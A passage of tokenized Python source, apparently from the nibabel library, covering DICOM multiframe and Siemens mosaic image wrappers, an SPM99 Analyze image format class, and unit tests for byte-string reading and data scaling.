intersection ( your_keys ) : <EOL> v1 , func = my_sig [ key ] <EOL> v2 , _ = your_sig [ key ] <EOL> if not func ( v1 , v2 ) : <EOL> return False <EOL> for keys , sig in ( ( my_keys - your_keys , my_sig ) , <EOL> ( your_keys - my_keys , your_sig ) ) : <EOL> for key in keys : <EOL> v1 , func = sig [ key ] <EOL> if not func ( v1 , None ) : <EOL> return False <EOL> return True <EOL> def _scale_data ( self , data ) : <EOL> scale = float ( self . get ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> offset = float ( self . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> return self . _apply_scale_offset ( data , scale , offset ) <EOL> def _apply_scale_offset ( self , data , scale , offset ) : <EOL> if scale != <NUM_LIT:1> : <EOL> if offset == <NUM_LIT:0> : <EOL> return data * scale <EOL> return data * scale + offset <EOL> if offset != <NUM_LIT:0> : <EOL> return data + offset <EOL> return data <EOL> @ one_time <EOL> def b_value ( self ) : <EOL> """<STR_LIT>""" <EOL> q_vec = self . q_vector <EOL> if q_vec is None : <EOL> return None <EOL> return q2bg ( q_vec ) [ <NUM_LIT:0> ] <EOL> @ one_time <EOL> def b_vector ( self ) : <EOL> """<STR_LIT>""" <EOL> q_vec = self . q_vector <EOL> if q_vec is None : <EOL> return None <EOL> return q2bg ( q_vec ) [ <NUM_LIT:1> ] <EOL> class MultiframeWrapper ( Wrapper ) : <EOL> """<STR_LIT>""" <EOL> is_multiframe = True <EOL> def __init__ ( self , dcm_data ) : <EOL> """<STR_LIT>""" <EOL> Wrapper . __init__ ( self , dcm_data ) <EOL> self . dcm_data = dcm_data <EOL> self . frames = dcm_data . get ( '<STR_LIT>' ) <EOL> try : <EOL> self . frames [ <NUM_LIT:0> ] <EOL> except TypeError : <EOL> raise WrapperError ( "<STR_LIT>" ) <EOL> try : <EOL> self . shared = dcm_data . get ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> except TypeError : <EOL> raise WrapperError ( "<STR_LIT>" ) <EOL> self . _shape = None <EOL> @ one_time <EOL> def image_shape ( self ) : <EOL> """<STR_LIT>""" <EOL> rows , cols = self . get ( '<STR_LIT>' ) , self . 
get ( '<STR_LIT>' ) <EOL> if None in ( rows , cols ) : <EOL> raise WrapperError ( "<STR_LIT>" ) <EOL> n_frames = self . get ( '<STR_LIT>' ) <EOL> assert len ( self . frames ) == n_frames <EOL> frame_indices = np . array ( <EOL> [ frame . FrameContentSequence [ <NUM_LIT:0> ] . DimensionIndexValues <EOL> for frame in self . frames ] ) <EOL> stack_ids = set ( frame . FrameContentSequence [ <NUM_LIT:0> ] . StackID <EOL> for frame in self . frames ) <EOL> if len ( stack_ids ) > <NUM_LIT:1> : <EOL> raise WrapperError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> dim_seq = [ dim . DimensionIndexPointer <EOL> for dim in self . get ( '<STR_LIT>' ) ] <EOL> stackid_tag = pydicom . datadict . tag_for_name ( '<STR_LIT>' ) <EOL> if stackid_tag in dim_seq : <EOL> stackid_dim_idx = dim_seq . index ( stackid_tag ) <EOL> frame_indices = np . delete ( frame_indices , stackid_dim_idx , axis = <NUM_LIT:1> ) <EOL> n_dim = frame_indices . shape [ <NUM_LIT:1> ] + <NUM_LIT:2> <EOL> self . _frame_indices = frame_indices <EOL> if n_dim < <NUM_LIT:4> : <EOL> return rows , cols , n_frames <EOL> ns_unique = [ len ( np . unique ( row ) ) for row in self . _frame_indices . T ] <EOL> shape = ( rows , cols ) + tuple ( ns_unique ) <EOL> n_vols = np . prod ( shape [ <NUM_LIT:3> : ] ) <EOL> if n_frames != n_vols * shape [ <NUM_LIT:2> ] : <EOL> raise WrapperError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return tuple ( shape ) <EOL> @ one_time <EOL> def image_orient_patient ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> iop = self . shared . PlaneOrientationSequence [ <NUM_LIT:0> ] . ImageOrientationPatient <EOL> except AttributeError : <EOL> try : <EOL> iop = self . frames [ <NUM_LIT:0> ] . PlaneOrientationSequence [ <NUM_LIT:0> ] . ImageOrientationPatient <EOL> except AttributeError : <EOL> raise WrapperError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if iop is None : <EOL> return None <EOL> iop = np . array ( list ( map ( float , iop ) ) ) <EOL> return np . array ( iop ) . 
reshape ( <NUM_LIT:2> , <NUM_LIT:3> ) . T <EOL> @ one_time <EOL> def voxel_sizes ( self ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> pix_measures = self . shared . PixelMeasuresSequence [ <NUM_LIT:0> ] <EOL> except AttributeError : <EOL> try : <EOL> pix_measures = self . frames [ <NUM_LIT:0> ] . PixelMeasuresSequence [ <NUM_LIT:0> ] <EOL> except AttributeError : <EOL> raise WrapperError ( "<STR_LIT>" ) <EOL> pix_space = pix_measures . PixelSpacing <EOL> try : <EOL> zs = pix_measures . SliceThickness <EOL> except AttributeError : <EOL> zs = self . get ( '<STR_LIT>' ) <EOL> if zs is None : <EOL> raise WrapperError ( '<STR_LIT>' ) <EOL> return tuple ( map ( float , list ( pix_space ) + [ zs ] ) ) <EOL> @ one_time <EOL> def image_position ( self ) : <EOL> try : <EOL> ipp = self . shared . PlanePositionSequence [ <NUM_LIT:0> ] . ImagePositionPatient <EOL> except AttributeError : <EOL> try : <EOL> ipp = self . frames [ <NUM_LIT:0> ] . PlanePositionSequence [ <NUM_LIT:0> ] . ImagePositionPatient <EOL> except AttributeError : <EOL> raise WrapperError ( '<STR_LIT>' ) <EOL> if ipp is None : <EOL> return None <EOL> return np . array ( list ( map ( float , ipp ) ) ) <EOL> @ one_time <EOL> def series_signature ( self ) : <EOL> signature = { } <EOL> eq = operator . eq <EOL> for key in ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> signature [ key ] = ( self . get ( key ) , eq ) <EOL> signature [ '<STR_LIT>' ] = ( self . image_shape , eq ) <EOL> signature [ '<STR_LIT>' ] = ( self . image_orient_patient , none_or_close ) <EOL> signature [ '<STR_LIT>' ] = ( self . voxel_sizes , none_or_close ) <EOL> return signature <EOL> def get_data ( self ) : <EOL> shape = self . image_shape <EOL> if shape is None : <EOL> raise WrapperError ( '<STR_LIT>' ) <EOL> data = self . get_pixel_array ( ) <EOL> data = data . transpose ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> sorted_indices = np . lexsort ( self . _frame_indices . T ) <EOL> data = data [ ... 
, sorted_indices ] <EOL> data = data . reshape ( shape , order = '<STR_LIT:F>' ) <EOL> return self . _scale_data ( data ) <EOL> def _scale_data ( self , data ) : <EOL> pix_trans = getattr ( <EOL> self . frames [ <NUM_LIT:0> ] , '<STR_LIT>' , None ) <EOL> if pix_trans is None : <EOL> return super ( MultiframeWrapper , self ) . _scale_data ( data ) <EOL> scale = float ( pix_trans [ <NUM_LIT:0> ] . RescaleSlope ) <EOL> offset = float ( pix_trans [ <NUM_LIT:0> ] . RescaleIntercept ) <EOL> return self . _apply_scale_offset ( data , scale , offset ) <EOL> class SiemensWrapper ( Wrapper ) : <EOL> """<STR_LIT>""" <EOL> is_csa = True <EOL> def __init__ ( self , dcm_data , csa_header = None ) : <EOL> """<STR_LIT>""" <EOL> super ( SiemensWrapper , self ) . __init__ ( dcm_data ) <EOL> if dcm_data is None : <EOL> dcm_data = { } <EOL> self . dcm_data = dcm_data <EOL> if csa_header is None : <EOL> csa_header = csar . get_csa_header ( dcm_data ) <EOL> if csa_header is None : <EOL> csa_header = { } <EOL> self . csa_header = csa_header <EOL> @ one_time <EOL> def slice_normal ( self ) : <EOL> std_slice_normal = super ( SiemensWrapper , self ) . slice_normal <EOL> csa_slice_normal = csar . get_slice_normal ( self . csa_header ) <EOL> if std_slice_normal is None and csa_slice_normal is None : <EOL> return None <EOL> elif std_slice_normal is None : <EOL> return np . array ( csa_slice_normal ) <EOL> elif csa_slice_normal is None : <EOL> return std_slice_normal <EOL> else : <EOL> dot_prod = np . dot ( csa_slice_normal , std_slice_normal ) <EOL> assert np . allclose ( np . fabs ( dot_prod ) , <NUM_LIT:1.0> , atol = <NUM_LIT> ) <EOL> if dot_prod < <NUM_LIT:0> : <EOL> return - std_slice_normal <EOL> else : <EOL> return std_slice_normal <EOL> @ one_time <EOL> def series_signature ( self ) : <EOL> """<STR_LIT>""" <EOL> signature = super ( SiemensWrapper , self ) . series_signature <EOL> ice = csar . get_ice_dims ( self . 
csa_header ) <EOL> if ice is not None : <EOL> ice = ice [ : <NUM_LIT:6> ] + ice [ <NUM_LIT:8> : <NUM_LIT:9> ] <EOL> signature [ '<STR_LIT>' ] = ( ice , lambda x , y : x == y ) <EOL> return signature <EOL> @ one_time <EOL> def b_matrix ( self ) : <EOL> """<STR_LIT>""" <EOL> hdr = self . csa_header <EOL> B = csar . get_b_matrix ( hdr ) <EOL> if B is None : <EOL> bval_requested = csar . get_b_value ( hdr ) <EOL> if bval_requested is None : <EOL> return None <EOL> if bval_requested != <NUM_LIT:0> : <EOL> raise csar . CSAError ( '<STR_LIT>' ) <EOL> return np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> R = self . rotation_matrix . T <EOL> B_vox = np . dot ( R , np . dot ( B , R . T ) ) <EOL> return nearest_pos_semi_def ( B_vox ) <EOL> @ one_time <EOL> def q_vector ( self ) : <EOL> """<STR_LIT>""" <EOL> B = self . b_matrix <EOL> if B is None : <EOL> return None <EOL> return B2q ( B , tol = <NUM_LIT> ) <EOL> class MosaicWrapper ( SiemensWrapper ) : <EOL> """<STR_LIT>""" <EOL> is_mosaic = True <EOL> def __init__ ( self , dcm_data , csa_header = None , n_mosaic = None ) : <EOL> """<STR_LIT>""" <EOL> SiemensWrapper . __init__ ( self , dcm_data , csa_header ) <EOL> if n_mosaic is None : <EOL> try : <EOL> n_mosaic = csar . get_n_mosaic ( self . csa_header ) <EOL> except KeyError : <EOL> pass <EOL> if n_mosaic is None or n_mosaic == <NUM_LIT:0> : <EOL> raise WrapperError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . n_mosaic = n_mosaic <EOL> self . mosaic_size = int ( np . ceil ( np . sqrt ( n_mosaic ) ) ) <EOL> @ one_time <EOL> def image_shape ( self ) : <EOL> """<STR_LIT>""" <EOL> rows = self . get ( '<STR_LIT>' ) <EOL> cols = self . get ( '<STR_LIT>' ) <EOL> if None in ( rows , cols ) : <EOL> return None <EOL> mosaic_size = self . mosaic_size <EOL> return ( int ( rows / mosaic_size ) , <EOL> int ( cols / mosaic_size ) , <EOL> self . 
n_mosaic ) <EOL> @ one_time <EOL> def image_position ( self ) : <EOL> """<STR_LIT>""" <EOL> ipp = super ( MosaicWrapper , self ) . image_position <EOL> md_rows , md_cols = ( self . get ( '<STR_LIT>' ) , self . get ( '<STR_LIT>' ) ) <EOL> iop = self . image_orient_patient <EOL> pix_spacing = self . get ( '<STR_LIT>' ) <EOL> if any ( x is None for x in ( ipp , md_rows , md_cols , iop , pix_spacing ) ) : <EOL> return None <EOL> pix_spacing = np . array ( list ( map ( float , pix_spacing ) ) ) <EOL> md_rc = np . array ( [ md_rows , md_cols ] ) <EOL> rd_rc = md_rc / self . mosaic_size <EOL> vox_trans_fixes = ( md_rc - rd_rc ) / <NUM_LIT:2> <EOL> Q = np . fliplr ( iop ) * pix_spacing <EOL> return ipp + np . dot ( Q , vox_trans_fixes [ : , None ] ) . ravel ( ) <EOL> def get_data ( self ) : <EOL> """<STR_LIT>""" <EOL> shape = self . image_shape <EOL> if shape is None : <EOL> raise WrapperError ( '<STR_LIT>' ) <EOL> n_slice_rows , n_slice_cols , n_mosaic = shape <EOL> n_slab_rows = self . mosaic_size <EOL> n_blocks = n_slab_rows ** <NUM_LIT:2> <EOL> data = self . get_pixel_array ( ) <EOL> v4 = data . reshape ( n_slab_rows , n_slice_rows , <EOL> n_slab_rows , n_slice_cols ) <EOL> v4 = v4 . transpose ( ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:2> ) ) <EOL> v3 = v4 . reshape ( ( n_slice_rows , n_slice_cols , n_blocks ) ) <EOL> v3 = v3 [ ... , : n_mosaic ] <EOL> return self . _scale_data ( v3 ) <EOL> def none_or_close ( val1 , val2 , rtol = <NUM_LIT> , atol = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if val1 is None and val2 is None : <EOL> return True <EOL> if val1 is None or val2 is None : <EOL> return False <EOL> return np . allclose ( val1 , val2 , rtol , atol ) </s>
<s> '''<STR_LIT>''' <EOL> import warnings <EOL> import numpy as np <EOL> from . externals . six import BytesIO <EOL> from . spatialimages import HeaderDataError , HeaderTypeError <EOL> from . batteryrunners import Report <EOL> from . import analyze <EOL> from . keywordonly import kw_only_meth <EOL> from . optpkg import optional_package <EOL> have_scipy = optional_package ( '<STR_LIT>' ) [ <NUM_LIT:1> ] <EOL> '''<STR_LIT>''' <EOL> header_key_dtd = analyze . header_key_dtd <EOL> image_dimension_dtd = analyze . image_dimension_dtd [ : ] <EOL> image_dimension_dtd [ <EOL> image_dimension_dtd . index ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> ] = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> data_history_dtd = analyze . data_history_dtd [ : ] <EOL> data_history_dtd [ <EOL> data_history_dtd . index ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> ] = ( '<STR_LIT>' , '<STR_LIT>' , ( <NUM_LIT:5> , ) ) <EOL> header_dtype = np . dtype ( header_key_dtd + <EOL> image_dimension_dtd + <EOL> data_history_dtd ) <EOL> class SpmAnalyzeHeader ( analyze . AnalyzeHeader ) : <EOL> '''<STR_LIT>''' <EOL> template_dtype = header_dtype <EOL> has_data_slope = True <EOL> has_data_intercept = False <EOL> @ classmethod <EOL> def default_structarr ( klass , endianness = None ) : <EOL> '''<STR_LIT>''' <EOL> hdr_data = super ( SpmAnalyzeHeader , klass ) . default_structarr ( endianness ) <EOL> hdr_data [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> return hdr_data <EOL> def get_slope_inter ( self ) : <EOL> '''<STR_LIT>''' <EOL> slope = self . _structarr [ '<STR_LIT>' ] <EOL> if np . isnan ( slope ) or slope in ( <NUM_LIT:0> , - np . inf , np . inf ) : <EOL> return None , None <EOL> return slope , None <EOL> def set_slope_inter ( self , slope , inter = None ) : <EOL> '''<STR_LIT>''' <EOL> if slope is None : <EOL> slope = np . nan <EOL> if slope in ( <NUM_LIT:0> , - np . inf , np . inf ) : <EOL> raise HeaderDataError ( '<STR_LIT>' ) <EOL> self . _structarr [ '<STR_LIT>' ] = slope <EOL> if inter in ( None , <NUM_LIT:0> ) or np . 
isnan ( inter ) : <EOL> return <EOL> raise HeaderTypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class Spm99AnalyzeHeader ( SpmAnalyzeHeader ) : <EOL> '''<STR_LIT>''' <EOL> def get_origin_affine ( self ) : <EOL> '''<STR_LIT>''' <EOL> hdr = self . _structarr <EOL> zooms = hdr [ '<STR_LIT>' ] [ <NUM_LIT:1> : <NUM_LIT:4> ] . copy ( ) <EOL> if self . default_x_flip : <EOL> zooms [ <NUM_LIT:0> ] *= - <NUM_LIT:1> <EOL> origin = hdr [ '<STR_LIT>' ] [ : <NUM_LIT:3> ] <EOL> dims = hdr [ '<STR_LIT>' ] [ <NUM_LIT:1> : <NUM_LIT:4> ] <EOL> if ( np . any ( origin ) and <EOL> np . all ( origin > - dims ) and np . all ( origin < dims * <NUM_LIT:2> ) ) : <EOL> origin = origin - <NUM_LIT:1> <EOL> else : <EOL> origin = ( dims - <NUM_LIT:1> ) / <NUM_LIT> <EOL> aff = np . eye ( <NUM_LIT:4> ) <EOL> aff [ : <NUM_LIT:3> , : <NUM_LIT:3> ] = np . diag ( zooms ) <EOL> aff [ : <NUM_LIT:3> , - <NUM_LIT:1> ] = - origin * zooms <EOL> return aff <EOL> get_best_affine = get_origin_affine <EOL> def set_origin_from_affine ( self , affine ) : <EOL> '''<STR_LIT>''' <EOL> if affine . shape != ( <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> hdr = self . _structarr <EOL> RZS = affine [ : <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> Z = np . sqrt ( np . sum ( RZS * RZS , axis = <NUM_LIT:0> ) ) <EOL> T = affine [ : <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> hdr [ '<STR_LIT>' ] [ : <NUM_LIT:3> ] = - T / Z + <NUM_LIT:1> <EOL> @ classmethod <EOL> def _get_checks ( klass ) : <EOL> checks = super ( Spm99AnalyzeHeader , klass ) . _get_checks ( ) <EOL> return checks + ( klass . _chk_origin , ) <EOL> @ staticmethod <EOL> def _chk_origin ( hdr , fix = False ) : <EOL> rep = Report ( HeaderDataError ) <EOL> origin = hdr [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:3> ] <EOL> dims = hdr [ '<STR_LIT>' ] [ <NUM_LIT:1> : <NUM_LIT:4> ] <EOL> if ( not np . any ( origin ) or <EOL> ( np . all ( origin > - dims ) and np . all ( origin < dims * <NUM_LIT:2> ) ) ) : <EOL> return hdr , rep <EOL> rep . 
problem_level = <NUM_LIT:20> <EOL> rep . problem_msg = '<STR_LIT>' <EOL> if fix : <EOL> rep . fix_msg = '<STR_LIT>' <EOL> return hdr , rep <EOL> class Spm99AnalyzeImage ( analyze . AnalyzeImage ) : <EOL> """<STR_LIT>""" <EOL> header_class = Spm99AnalyzeHeader <EOL> files_types = ( ( '<STR_LIT:image>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> has_affine = True <EOL> makeable = True <EOL> rw = have_scipy <EOL> @ classmethod <EOL> @ kw_only_meth ( <NUM_LIT:1> ) <EOL> def from_file_map ( klass , file_map , mmap = True ) : <EOL> '''<STR_LIT>''' <EOL> ret = super ( Spm99AnalyzeImage , klass ) . from_file_map ( file_map , <EOL> mmap = mmap ) <EOL> try : <EOL> matf = file_map [ '<STR_LIT>' ] . get_prepare_fileobj ( ) <EOL> except IOError : <EOL> return ret <EOL> with matf : <EOL> contents = matf . read ( ) <EOL> if len ( contents ) == <NUM_LIT:0> : <EOL> return ret <EOL> import scipy . io as sio <EOL> mats = sio . loadmat ( BytesIO ( contents ) ) <EOL> if '<STR_LIT>' in mats : <EOL> mat = mats [ '<STR_LIT>' ] <EOL> if mat . ndim > <NUM_LIT:2> : <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> mat = mat [ : , : , <NUM_LIT:0> ] <EOL> ret . _affine = mat <EOL> elif '<STR_LIT:M>' in mats : <EOL> hdr = ret . _header <EOL> if hdr . default_x_flip : <EOL> ret . _affine = np . dot ( np . diag ( [ - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) , mats [ '<STR_LIT:M>' ] ) <EOL> else : <EOL> ret . _affine = mats [ '<STR_LIT:M>' ] <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> to_111 = np . eye ( <NUM_LIT:4> ) <EOL> to_111 [ : <NUM_LIT:3> , <NUM_LIT:3> ] = <NUM_LIT:1> <EOL> ret . _affine = np . dot ( ret . _affine , to_111 ) <EOL> return ret <EOL> def to_file_map ( self , file_map = None ) : <EOL> '''<STR_LIT>''' <EOL> if file_map is None : <EOL> file_map = self . file_map <EOL> super ( Spm99AnalyzeImage , self ) . to_file_map ( file_map ) <EOL> mat = self . 
_affine <EOL> if mat is None : <EOL> return <EOL> import scipy . io as sio <EOL> hdr = self . _header <EOL> if hdr . default_x_flip : <EOL> M = np . dot ( np . diag ( [ - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) , mat ) <EOL> else : <EOL> M = mat <EOL> from_111 = np . eye ( <NUM_LIT:4> ) <EOL> from_111 [ : <NUM_LIT:3> , <NUM_LIT:3> ] = - <NUM_LIT:1> <EOL> M = np . dot ( M , from_111 ) <EOL> mat = np . dot ( mat , from_111 ) <EOL> with file_map [ '<STR_LIT>' ] . get_prepare_fileobj ( mode = '<STR_LIT:wb>' ) as mfobj : <EOL> sio . savemat ( mfobj , { '<STR_LIT:M>' : M , '<STR_LIT>' : mat } , format = '<STR_LIT:4>' ) <EOL> load = Spm99AnalyzeImage . load <EOL> save = Spm99AnalyzeImage . instance_to_filename </s>
<s> """<STR_LIT>""" <EOL> from . . fileutils import read_zt_byte_strings <EOL> from numpy . testing import ( assert_almost_equal , <EOL> assert_array_equal ) <EOL> from nose . tools import ( assert_true , assert_false , assert_raises , <EOL> assert_equal , assert_not_equal ) <EOL> from . . tmpdirs import InTemporaryDirectory <EOL> def test_read_zt_byte_strings ( ) : <EOL> binary = b'<STR_LIT>' <EOL> with InTemporaryDirectory ( ) : <EOL> path = '<STR_LIT>' <EOL> fwrite = open ( path , '<STR_LIT:wb>' ) <EOL> fwrite . write ( binary ) <EOL> fwrite . close ( ) <EOL> fread = open ( path , '<STR_LIT:rb>' ) <EOL> assert_equal ( read_zt_byte_strings ( fread ) , [ b'<STR_LIT>' ] ) <EOL> assert_equal ( fread . tell ( ) , <NUM_LIT:9> ) <EOL> fread . seek ( <NUM_LIT:0> ) <EOL> assert_equal ( read_zt_byte_strings ( fread , <NUM_LIT:2> ) , <EOL> [ b'<STR_LIT>' , b'<STR_LIT>' ] ) <EOL> assert_equal ( fread . tell ( ) , <NUM_LIT> ) <EOL> fread . seek ( <NUM_LIT:0> ) <EOL> assert_raises ( ValueError , read_zt_byte_strings , fread , <NUM_LIT:3> ) <EOL> fread . seek ( <NUM_LIT:9> ) <EOL> assert_raises ( ValueError , read_zt_byte_strings , fread , <NUM_LIT:2> ) <EOL> fread . seek ( <NUM_LIT:0> ) <EOL> assert_equal ( read_zt_byte_strings ( fread , <NUM_LIT:2> , <NUM_LIT:4> ) , <EOL> [ b'<STR_LIT>' , b'<STR_LIT>' ] ) <EOL> fread . close ( ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import division , print_function , absolute_import <EOL> import numpy as np <EOL> from . . externals . six import BytesIO <EOL> from . . volumeutils import ( calculate_scale , scale_min_max , finite_range , <EOL> apply_read_scaling , array_to_file , array_from_file ) <EOL> from . . casting import type_info <EOL> from . . testing import suppress_warnings <EOL> from numpy . testing import ( assert_array_almost_equal , assert_array_equal ) <EOL> from nose . tools import ( assert_true , assert_equal , assert_raises , <EOL> assert_not_equal ) <EOL> DEBUG = True <EOL> def test_scale_min_max ( ) : <EOL> mx_dt = np . maximum_sctype ( np . float ) <EOL> for tp in np . sctypes [ '<STR_LIT>' ] + np . sctypes [ '<STR_LIT:int>' ] : <EOL> info = np . iinfo ( tp ) <EOL> imin = np . array ( info . min , dtype = mx_dt ) <EOL> imax = np . array ( info . max , dtype = mx_dt ) <EOL> value_pairs = ( <EOL> ( <NUM_LIT:0> , imax ) , <EOL> ( imin , <NUM_LIT:0> ) , <EOL> ( imin , imax ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:10> ) , <EOL> ( - <NUM_LIT:1> , - <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> ( - <NUM_LIT:10> , - <NUM_LIT:1> ) , <EOL> ( - <NUM_LIT:100> , <NUM_LIT:10> ) ) <EOL> for mn , mx in value_pairs : <EOL> scale , inter = scale_min_max ( mn , mx , tp , True ) <EOL> if mx - mn : <EOL> assert_array_almost_equal , ( mx - inter ) / scale , imax <EOL> assert_array_almost_equal , ( mn - inter ) / scale , imin <EOL> else : <EOL> assert_equal , ( scale , inter ) , ( <NUM_LIT:1.0> , mn ) <EOL> if imin == <NUM_LIT:0> and mn < <NUM_LIT:0> and mx > <NUM_LIT:0> : <EOL> ( assert_raises , ValueError , <EOL> scale_min_max , mn , mx , tp , False ) <EOL> continue <EOL> scale , inter = scale_min_max ( mn , mx , tp , False ) <EOL> assert_equal , inter , <NUM_LIT:0.0> <EOL> if mn == <NUM_LIT:0> and mx == <NUM_LIT:0> : <EOL> assert_equal , scale , <NUM_LIT:1.0> <EOL> continue <EOL> sc_mn = mn / scale <EOL> sc_mx = mx / scale <EOL> assert_true , 
sc_mn >= imin <EOL> assert_true , sc_mx <= imax <EOL> if imin == <NUM_LIT:0> : <EOL> if mx > <NUM_LIT:0> : <EOL> assert_array_almost_equal , mx / scale , imax <EOL> else : <EOL> assert_array_almost_equal , mn / scale , imax <EOL> continue <EOL> if abs ( mx ) >= abs ( mn ) : <EOL> assert_array_almost_equal , mx / scale , imax <EOL> else : <EOL> assert_array_almost_equal , mn / scale , imin <EOL> def test_finite_range ( ) : <EOL> for in_arr , res in ( <EOL> ( [ [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ np . inf , np . nan , - np . inf ] ] , ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( np . array ( [ [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ np . inf , np . nan , - np . inf ] ] ) , ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( [ [ np . nan ] , [ np . nan ] ] , ( np . inf , - np . inf ) ) , <EOL> ( np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) ) + np . nan , ( np . inf , - np . inf ) ) , <EOL> ( [ [ - np . inf ] , [ np . inf ] ] , ( np . inf , - np . inf ) ) , <EOL> ( np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) ) + np . inf , ( np . inf , - np . inf ) ) , <EOL> ( [ [ np . nan , - <NUM_LIT:1> , <NUM_LIT:2> ] , [ - <NUM_LIT:2> , np . nan , <NUM_LIT:1> ] ] , ( - <NUM_LIT:2> , <NUM_LIT:2> ) ) , <EOL> ( [ [ np . nan , - np . inf , <NUM_LIT:2> ] , [ - <NUM_LIT:2> , np . nan , np . inf ] ] , ( - <NUM_LIT:2> , <NUM_LIT:2> ) ) , <EOL> ( [ [ - np . inf , <NUM_LIT:2> ] , [ np . nan , <NUM_LIT:1> ] ] , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) , <EOL> ( [ [ np . nan , - np . inf , <NUM_LIT:2> ] , [ - <NUM_LIT:2> , np . nan , np . inf ] ] , ( - <NUM_LIT:2> , <NUM_LIT:2> ) ) , <EOL> ( [ np . nan ] , ( np . inf , - np . inf ) ) , <EOL> ( [ np . inf ] , ( np . inf , - np . inf ) ) , <EOL> ( [ - np . inf ] , ( np . inf , - np . inf ) ) , <EOL> ( [ np . inf , <NUM_LIT:1> ] , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( [ - np . inf , <NUM_LIT:1> ] , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( [ [ ] , [ ] ] , ( np . inf , - np . inf ) ) , <EOL> ( np . 
array ( [ [ - <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:4> ] ] , dtype = np . int ) , ( - <NUM_LIT:3> , <NUM_LIT:4> ) ) , <EOL> ( np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ] , dtype = np . uint ) , ( <NUM_LIT:0> , <NUM_LIT:4> ) ) , <EOL> ( [ <NUM_LIT:0.> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , ( <NUM_LIT:0> , <NUM_LIT:3> ) ) , <EOL> ( [ [ np . nan , - <NUM_LIT:1> - <NUM_LIT> , <NUM_LIT:2> ] , [ - <NUM_LIT:2> , np . nan , <NUM_LIT:1> + <NUM_LIT> ] ] , ( - <NUM_LIT:2> , <NUM_LIT:2> ) ) , <EOL> ( [ [ np . nan , - <NUM_LIT:1> , <NUM_LIT:2> - <NUM_LIT> ] , [ - <NUM_LIT:2> + <NUM_LIT> , np . nan , <NUM_LIT:1> ] ] , ( - <NUM_LIT:2> + <NUM_LIT> , <NUM_LIT:2> - <NUM_LIT> ) ) , <EOL> ) : <EOL> assert_equal ( finite_range ( in_arr ) , res ) <EOL> assert_equal ( finite_range ( in_arr , False ) , res ) <EOL> assert_equal ( finite_range ( in_arr , check_nan = False ) , res ) <EOL> has_nan = np . any ( np . isnan ( in_arr ) ) <EOL> assert_equal ( finite_range ( in_arr , True ) , res + ( has_nan , ) ) <EOL> assert_equal ( finite_range ( in_arr , check_nan = True ) , res + ( has_nan , ) ) <EOL> in_arr = np . array ( in_arr ) <EOL> flat_arr = in_arr . ravel ( ) <EOL> assert_equal ( finite_range ( flat_arr ) , res ) <EOL> assert_equal ( finite_range ( flat_arr , True ) , res + ( has_nan , ) ) <EOL> if in_arr . dtype . kind == '<STR_LIT:f>' : <EOL> c_arr = in_arr . astype ( np . complex ) <EOL> assert_equal ( finite_range ( c_arr ) , res ) <EOL> assert_equal ( finite_range ( c_arr , True ) , res + ( has_nan , ) ) <EOL> a = np . array ( [ [ <NUM_LIT:1.> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ] ) . view ( [ ( '<STR_LIT>' , '<STR_LIT:f>' ) ] ) <EOL> assert_raises ( TypeError , finite_range , a ) <EOL> def test_calculate_scale ( ) : <EOL> npa = np . array <EOL> res = 